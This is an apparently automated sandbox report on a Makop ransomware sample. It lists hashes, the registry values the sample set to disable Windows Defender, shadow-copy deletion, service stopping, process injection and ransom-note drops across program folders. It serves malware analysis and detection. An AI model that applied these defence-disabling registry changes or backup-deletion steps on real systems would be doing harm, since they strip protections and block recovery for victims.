Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
136s -
max time network
161s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
21/09/2022, 04:04
Static task
static1
Behavioral task
behavioral1
Sample
HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
Resource
win10v2004-20220812-en
General
-
Target
HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
-
Size
1.9MB
-
MD5
40ec0e62856036983be04f31ce670fb9
-
SHA1
0d04b8139fe71a1736a8168fbf072df61d7d7bd6
-
SHA256
48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521
-
SHA512
1094d49d3fcb757fe2d1c49d1e441ab086f4cff80ffd8572b0017546350838dcba83f102796009d811a360f6825928c13e3697b7dd462627bb83fb92534fc806
-
SSDEEP
192:z/TeYoeb67sc8+otH8SESePujd2kTCMZehZtzMuuQzBLerxA/GWeGMEd022XbTFi:z/yYoebe5JotHESxjuM63KI
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\8f284f7d-68eb-4c98-b306-be1d6bb87186\readme-warning.txt
makop
Signatures
-
Makop
Ransomware family discovered by @VK_Intel in early 2020.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
description pid Process procid_target PID 4676 created 320 4676 svchost.exe 90 PID 4676 created 4192 4676 svchost.exe 97 PID 4676 created 4192 4676 svchost.exe 97 -
Turns off Windows Defender SpyNet reporting 2 TTPs
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe = "0" HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Nirsoft 4 IoCs
resource yara_rule behavioral2/files/0x0006000000022e64-136.dat Nirsoft behavioral2/files/0x0006000000022e64-137.dat Nirsoft behavioral2/files/0x0006000000022e64-139.dat Nirsoft behavioral2/files/0x0006000000022e6a-166.dat Nirsoft -
pid Process 2044 wbadmin.exe -
Executes dropped EXE 3 IoCs
pid Process 2736 AdvancedRun.exe 3124 AdvancedRun.exe 4192 AdvancedRun.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation AdvancedRun.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe = "0" HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3972 set thread context of 320 3972 HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe 90 PID 5068 set thread context of 2736 5068 HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe 132 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_ja.jar HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageWideTile.scale-125_contrast-black.png HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\cs-cz\readme-warning.txt HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_zh_4.4.0.v20140623020002.jar HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Retail-ul-phn.xrm-ms HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\AppPackageBadgeLogo.scale-100_contrast-white.png HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.targetsize-40_altform-unplated.png HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\line_2x.png HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\hive.xsl HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-30_altform-fullcolor.png HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessPipcDemoR_BypassTrial365-ppd.xrm-ms HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\WATER\WATER.INF HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteNotebookLargeTile.scale-150.png HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\contrast-black\MixedRealityPortalAppList.targetsize-60_altform-unplated_contrast-black.png HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\offlineStrings.js HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\readme-warning.txt HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription4-ul-oob.xrm-ms HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Store\LargeTile.scale-150.png HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ja-jp\ui-strings.js HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File created C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\readme-warning.txt HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\Spacer\3px.png HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.contrast-black_scale-200.png HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-32_contrast-white.png HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\TimerLargeTile.contrast-black_scale-125.png HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-16_altform-unplated.png HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\OrientationControlInnerCircleHover.png HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\bg_pattern_RHP.png HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_ko.properties HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\update_tracking\readme-warning.txt HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-96_contrast-white.png HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-96_altform-unplated_contrast-black.png HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteSmallTile.scale-200.png HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\it-it\readme-warning.txt HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine_2.3.0.v20140506-1720.jar HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\AccessRuntime2019R_PrepidBypass-ul-oob.xrm-ms HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.scale-150_contrast-white.png HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Lighting\Dark\Default.png HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.NET.Native.Runtime.2.2_2.2.27328.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteSectionSmallTile.scale-125.png HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pl-pl\readme-warning.txt HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\license.html HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-appui.xml HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\firstrun\startup_background.png HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jvmti.h HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-templates.xml HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_OEM_Perp-ul-phn.xrm-ms HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-black_scale-100.png HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\VideoLAN\VLC\THANKS.txt HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Gravel.jpg HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteSectionLargeTile.scale-100.png HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Images\SkypeMedTile.scale-200_contrast-white.png HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.contrast-white_targetsize-60.png HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.targetsize-48.png HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.46.11001.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\GamesXboxHubWideTile.scale-100.png HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\AppIcon.scale-100_contrast-black.png HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\01_googleimage.luac HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteNotebookWideTile.scale-200.png HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\BadgeLogo.scale-125_contrast-white.png HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RMNSQUE\PREVIEW.GIF HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\OrientationSensorCalibrationFigure.png HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\readme-warning.txt HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe -
Launches sc.exe 22 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1860 sc.exe 3228 sc.exe 5048 sc.exe 3936 sc.exe 1220 sc.exe 2752 sc.exe 3096 sc.exe 1260 sc.exe 3196 sc.exe 3192 sc.exe 728 sc.exe 4200 sc.exe 3888 sc.exe 4544 sc.exe 1016 sc.exe 3620 sc.exe 2340 sc.exe 612 sc.exe 3528 sc.exe 2800 sc.exe 1724 sc.exe 4720 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1476 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 2736 AdvancedRun.exe 2736 AdvancedRun.exe 2736 AdvancedRun.exe 2736 AdvancedRun.exe 3124 AdvancedRun.exe 3124 AdvancedRun.exe 3124 AdvancedRun.exe 3124 AdvancedRun.exe 2004 powershell.exe 2004 powershell.exe 4192 AdvancedRun.exe 4192 AdvancedRun.exe 4192 AdvancedRun.exe 4192 AdvancedRun.exe 320 HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe 320 HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe 4556 powershell.exe 4556 powershell.exe -
Suspicious use of AdjustPrivilegeToken 58 IoCs
description pid Process Token: SeDebugPrivilege 2736 AdvancedRun.exe Token: SeImpersonatePrivilege 2736 AdvancedRun.exe Token: SeDebugPrivilege 3124 AdvancedRun.exe Token: SeImpersonatePrivilege 3124 AdvancedRun.exe Token: SeDebugPrivilege 2004 powershell.exe Token: SeTcbPrivilege 4676 svchost.exe Token: SeTcbPrivilege 4676 svchost.exe Token: SeDebugPrivilege 4192 AdvancedRun.exe Token: SeImpersonatePrivilege 4192 AdvancedRun.exe Token: SeBackupPrivilege 4108 vssvc.exe Token: SeRestorePrivilege 4108 vssvc.exe Token: SeAuditPrivilege 4108 vssvc.exe Token: SeBackupPrivilege 892 wbengine.exe Token: SeRestorePrivilege 892 wbengine.exe Token: SeSecurityPrivilege 892 wbengine.exe Token: SeIncreaseQuotaPrivilege 3436 WMIC.exe Token: SeSecurityPrivilege 3436 WMIC.exe Token: SeTakeOwnershipPrivilege 3436 WMIC.exe Token: SeLoadDriverPrivilege 3436 WMIC.exe Token: SeSystemProfilePrivilege 3436 WMIC.exe Token: SeSystemtimePrivilege 3436 WMIC.exe Token: SeProfSingleProcessPrivilege 3436 WMIC.exe Token: SeIncBasePriorityPrivilege 3436 WMIC.exe Token: SeCreatePagefilePrivilege 3436 WMIC.exe Token: SeBackupPrivilege 3436 WMIC.exe Token: SeRestorePrivilege 3436 WMIC.exe Token: SeShutdownPrivilege 3436 WMIC.exe Token: SeDebugPrivilege 3436 WMIC.exe Token: SeSystemEnvironmentPrivilege 3436 WMIC.exe Token: SeRemoteShutdownPrivilege 3436 